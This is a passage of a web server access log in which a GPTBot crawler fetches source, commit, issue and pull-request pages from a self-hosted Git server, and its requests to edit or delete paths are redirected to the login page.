"https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 35821] [Gzip 11.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 13952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 1923] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 10256] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29903] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:16:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 12753] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:58:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:16:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:16:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17638] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:16:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15649] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:58:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/main.py" -[17/Feb/2026:16:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" -[17/Feb/2026:16:58:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:58:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:58:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:58:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 12017] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 9800] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17895] [Gzip 8.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 9805] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:16:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17060] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:16:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 901] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:16:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" -[17/Feb/2026:16:59:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:59:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:16:59:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:59:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:16:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" -[17/Feb/2026:16:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21443] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" -[17/Feb/2026:16:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17365] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" -[17/Feb/2026:16:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" -[17/Feb/2026:16:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17366] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" -[17/Feb/2026:16:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir" [Client 74.7.227.38] [Length 69131] [Gzip 13.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:16:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:16:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:16:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:16:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:16:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:16:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:16:59:14 +0000] - 200 200 - GET https 